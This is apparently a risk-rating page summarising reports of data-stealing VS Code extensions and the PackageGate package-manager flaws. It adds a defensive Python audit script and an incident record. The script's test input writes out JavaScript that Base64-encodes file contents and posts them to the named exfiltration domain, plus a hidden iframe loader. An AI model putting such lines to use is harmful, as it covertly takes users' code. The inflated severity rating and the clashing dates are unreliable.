Malicious VS Code Extensions Exfiltrate Developer Data to China-Based Servers
Cybersecurity researchers have uncovered two malicious Visual Studio Code (VS Code) extensions masquerading as AI-powered coding assistants while secretly harvesting developer data and transmitting it to servers in China. The extensions, still available on the official Visual Studio Marketplace, have amassed a combined 1.5 million installs:
- ChatGPT - 中文版 (whensunset.chatgpt-china) – 1.34 million installs
- ChatGPT - ChatMoss (CodeMoss) (zhukunpeng.chat-moss) – 151,751 installs
Dubbed MaliciousCorgi by Koi Security, the extensions function as advertised, providing autocomplete suggestions and code error explanations, while covertly exfiltrating data. Every opened file and code modification is encoded in Base64 and sent to a China-based server (aihao123[.]cn) without user consent. The malware also includes a remotely triggered real-time monitoring feature that exfiltrates up to 50 workspace files per session.
Additionally, the extensions embed a hidden zero-pixel iframe that loads four Chinese analytics SDKs (Zhuge.io, GrowingIO, TalkingData, and Baidu Analytics) to fingerprint devices and build detailed user profiles.
JavaScript Package Managers Vulnerable to Supply Chain Attacks
In a separate disclosure, Koi Security identified six zero-day vulnerabilities (collectively named PackageGate) in the JavaScript package managers npm, pnpm, vlt, and Bun that bypass security controls designed to prevent malicious script execution during package installation. These flaws undermine defenses such as --ignore-scripts and lockfile integrity checks, which were introduced after the Shai-Hulud worm exploited postinstall scripts to hijack npm tokens.
Following responsible disclosure, fixes were implemented in:
- pnpm (v10.26.0) – Tracked as CVE-2025-69264 (CVSS 8.8) and CVE-2025-69263 (CVSS 7.5)
- vlt (v1.0.0-rc.10)
- Bun (v1.3.5)
However, npm has declined to patch the issue, stating that users are responsible for vetting package content. GitHub, npm’s parent company, confirmed it is actively addressing the flaw but emphasized that git dependencies inherently trust repository contents, including configuration files. GitHub has also reinforced supply chain security measures, including deprecating legacy tokens, enforcing shorter expiration for granular tokens, and removing 2FA bypass options for local package publishing.
As of September 2025, organizations remain advised to disable scripts and commit lockfiles, though researchers warn these measures alone may not fully mitigate risks until PackageGate is resolved.
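The behaviours described above (the two extension IDs, Base64-encoded uploads to aihao123[.]cn, a zero-pixel iframe loading analytics SDKs) and the hardening advice (ignore-scripts plus committed lockfiles) can be turned into a local audit a developer runs against their own machine. The script below is an added example written for this page; it is not code from the article, from Koi Security, or from any of the projects named. It assumes VS Code's extensions.json is a JSON array whose entries carry an `identifier.id` field (an assumption about that file's format), matches the analytics vendors by plain substring markers rather than by real SDK URLs, and uses constructed sample inputs so it runs offline. The Base64-plus-network and zero-pixel-iframe checks are the editor's own heuristics approximating the behaviour the article reports, not indicators published by the researchers.

```python
"""Local audit for the indicators and mitigations described in the article.

Added example, not from the article or any named project. File-format and
heuristic assumptions are marked inline.
"""
import json
import re
from typing import List

# Extension IDs named in the article.
KNOWN_MALICIOUS_EXTENSIONS = {
    "whensunset.chatgpt-china",
    "zhukunpeng.chat-moss",
}

# Exfiltration domain named in the article (defanged brackets removed).
EXFIL_DOMAIN = "aihao123.cn"

# Analytics SDK vendors named in the article, matched as lowercase
# substrings. Assumption: vendor names appear in the loader code or URL.
ANALYTICS_SDK_MARKERS = {
    "zhuge": "Zhuge.io",
    "growingio": "GrowingIO",
    "talkingdata": "TalkingData",
    "baidu": "Baidu Analytics",
}

# Editor's heuristics: Base64 encoding in the same file as a network call,
# and an <iframe> with a zero width or height.
BASE64_RE = re.compile(r"btoa\s*\(|toString\s*\(\s*[\"']base64[\"']\s*\)")
NETWORK_RE = re.compile(r"\bfetch\s*\(|XMLHttpRequest|https?\.request\s*\(|axios\.")
ZERO_PIXEL_IFRAME_RE = re.compile(
    r"<iframe[^>]*\b(?:width|height)\s*=\s*[\"']?0\b", re.IGNORECASE
)


def find_known_malicious(extensions_json_text: str) -> List[str]:
    """Return installed extension IDs matching the two IDs from the article.

    Assumes the extensions.json layout: a list of objects with identifier.id.
    """
    hits = []
    for entry in json.loads(extensions_json_text):
        ext_id = entry.get("identifier", {}).get("id", "").lower()
        if ext_id in KNOWN_MALICIOUS_EXTENSIONS:
            hits.append(ext_id)
    return hits


def scan_source(js_text: str) -> List[str]:
    """Flag the behaviours the article describes in one extension source file."""
    findings = []
    lowered = js_text.lower().replace("[.]", ".")
    if EXFIL_DOMAIN in lowered:
        findings.append(f"contacts exfiltration domain {EXFIL_DOMAIN}")
    if BASE64_RE.search(js_text) and NETWORK_RE.search(js_text):
        findings.append("base64-encodes data in a file that also makes network calls")
    if ZERO_PIXEL_IFRAME_RE.search(js_text):
        findings.append("embeds a zero-pixel iframe")
    for marker, vendor in ANALYTICS_SDK_MARKERS.items():
        if marker in lowered:
            findings.append(f"loads {vendor} analytics SDK")
    return findings


def npmrc_ignores_scripts(npmrc_text: str) -> bool:
    """True when an .npmrc sets ignore-scripts=true (ini-style key=value lines)."""
    for raw in npmrc_text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#" or "=" not in line:
            continue  # blank line, comment, or not a key=value pair
        key, value = (part.strip() for part in line.split("=", 1))
        if key == "ignore-scripts":
            return value.lower() == "true"
    return False


# Constructed sample inputs (not real extension data) to exercise the checks.
SAMPLE_EXTENSIONS_JSON = json.dumps([
    {"identifier": {"id": "ms-python.python"}, "version": "2024.0.0"},
    {"identifier": {"id": "whensunset.chatgpt-china"}, "version": "1.0.0"},
])

SAMPLE_SUSPICIOUS_JS = """
const payload = Buffer.from(doc.getText()).toString('base64');
fetch('https://aihao123.cn/upload', {method: 'POST', body: payload});
panel.webview.html = '<iframe width="0" height="0" src="https://sdk.zhuge.io/x.js"></iframe>';
"""

SAMPLE_BENIGN_JS = """
const text = doc.getText();
vscode.window.showInformationMessage(text.length + ' chars');
"""

SAMPLE_NPMRC = "registry=https://registry.npmjs.org/\n; hardened per advisory\nignore-scripts = true\n"

if __name__ == "__main__":
    print("known malicious extensions:", find_known_malicious(SAMPLE_EXTENSIONS_JSON))
    print("suspicious source:", scan_source(SAMPLE_SUSPICIOUS_JS))
    print("benign source:", scan_source(SAMPLE_BENIGN_JS))
    print("ignore-scripts set:", npmrc_ignores_scripts(SAMPLE_NPMRC))
```

On a real machine the same functions would be fed the contents of `~/.vscode/extensions/extensions.json`, each extension's bundled JavaScript, and the project or user `.npmrc`. The heuristics are intentionally loose: a benign extension that Base64-encodes images and also calls `fetch` will be flagged, so treat a hit as a prompt to read the code, not as a verdict.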
Source: https://thehackernews.com/2026/01/malicious-vs-code-ai-extensions-with-15.html
npm, Inc. cybersecurity rating report: https://www.rankiteo.com/company/npm-inc-
Microsoft Visual Studio cybersecurity rating report: https://www.rankiteo.com/company/microsoft-visual-studio
{
"id": "NPMMIC1769475520",
"linkid": "npm-inc-, microsoft-visual-studio",
"type": "Vulnerability",
"date": "9/2025",
"severity": "100",
"impact": "5",
"explanation": "Attack threatening the organization's existence"
}
{'affected_entities': [{'customers_affected': '1.5 million',
'industry': 'Software Development',
'location': 'Global',
'name': 'VS Code Marketplace Users',
'size': '1.5 million installs (combined)',
'type': 'Developers'},
{'industry': 'Software Development',
'location': 'Global',
'name': 'npm Users',
'type': 'Developers'},
{'industry': 'Software Development',
'location': 'Global',
'name': 'pnpm Users',
'type': 'Developers'},
{'industry': 'Software Development',
'location': 'Global',
'name': 'vlt Users',
'type': 'Developers'},
{'industry': 'Software Development',
'location': 'Global',
'name': 'Bun Users',
'type': 'Developers'}],
'attack_vector': ['Malicious Extensions',
'Zero-Day Vulnerabilities in Package Managers'],
'data_breach': {'data_encryption': 'Base64 encoding (not encryption)',
'data_exfiltration': 'Base64-encoded files sent to '
'aihao123[.]cn',
'personally_identifiable_information': 'Device fingerprints, '
'user profiles (via '
'Zhuge.io, GrowingIO, '
'TalkingData, Baidu '
'Analytics)',
'sensitivity_of_data': 'High (developer codebases, PII via '
'analytics SDKs)',
'type_of_data_compromised': ['Workspace files',
'Code modifications',
'Device fingerprints',
'User profiles']},
'date_publicly_disclosed': '2025-09',
'description': 'Cybersecurity researchers uncovered two malicious Visual '
'Studio Code (VS Code) extensions masquerading as AI-powered '
'coding assistants while secretly harvesting developer data '
'and transmitting it to servers in China. Additionally, six '
'zero-day vulnerabilities in JavaScript package managers (npm, '
'pnpm, vlt, and Bun) were identified, bypassing security '
'controls designed to prevent malicious script execution '
'during package installation.',
'impact': {'brand_reputation_impact': 'Potential erosion of trust in VS Code '
'Marketplace and JavaScript package '
'managers',
'data_compromised': 'Developer workspace files, code '
'modifications, device fingerprints, user '
'profiles',
'identity_theft_risk': 'High (device fingerprinting and user '
'profiling)',
'operational_impact': 'Potential unauthorized access to sensitive '
'codebases and developer environments',
'systems_affected': ['VS Code Extensions',
'npm',
'pnpm',
'vlt',
'Bun']},
'investigation_status': 'Ongoing (malicious extensions still available; npm '
'unpatched)',
'lessons_learned': 'Need for stricter vetting of VS Code extensions and '
'package manager security controls. Importance of '
'disabling scripts and committing lockfiles despite '
'inherent risks.',
'motivation': ['Data Theft', 'Supply Chain Compromise'],
'post_incident_analysis': {'corrective_actions': ['Stricter review processes '
'for VS Code extensions.',
'Patching vulnerabilities '
'in package managers (pnpm, '
'vlt, Bun).',
'Enhanced supply chain '
'security measures by '
'GitHub/npm.'],
'root_causes': ['Lack of rigorous vetting for VS '
'Code extensions on the official '
'marketplace.',
'Zero-day vulnerabilities in '
'JavaScript package managers '
'bypassing security controls.',
'Inherent trust in git '
'dependencies and package '
'contents.']},
'recommendations': ['Remove or avoid installing the malicious VS Code '
'extensions (whensunset.chatgpt-china, '
'zhukunpeng.chat-moss).',
'Update pnpm (v10.26.0+), vlt (v1.0.0-rc.10+), and Bun '
'(v1.3.5+) to patched versions.',
'Disable scripts in package managers and commit '
'lockfiles.',
'Monitor for unauthorized data exfiltration from '
'development environments.',
'Enforce shorter token expiration and remove 2FA bypass '
'options for local package publishing.'],
'references': [{'source': 'Koi Security'}, {'source': 'GitHub (npm)'}],
'response': {'containment_measures': ['Removal of malicious extensions '
'(pending)',
'Patches for pnpm, vlt, and Bun'],
'remediation_measures': ['Disabling scripts in package managers',
'Committing lockfiles',
'Deprecating legacy tokens by GitHub'],
'third_party_assistance': 'Koi Security (research and '
'disclosure)'},
'title': 'Malicious VS Code Extensions Exfiltrate Developer Data to '
'China-Based Servers and JavaScript Package Managers Vulnerable to '
'Supply Chain Attacks',
'type': ['Supply Chain Attack', 'Data Exfiltration'],
'vulnerability_exploited': ['CVE-2025-69264 (CVSS 8.8)',
'CVE-2025-69263 (CVSS 7.5)',
'PackageGate Vulnerabilities']}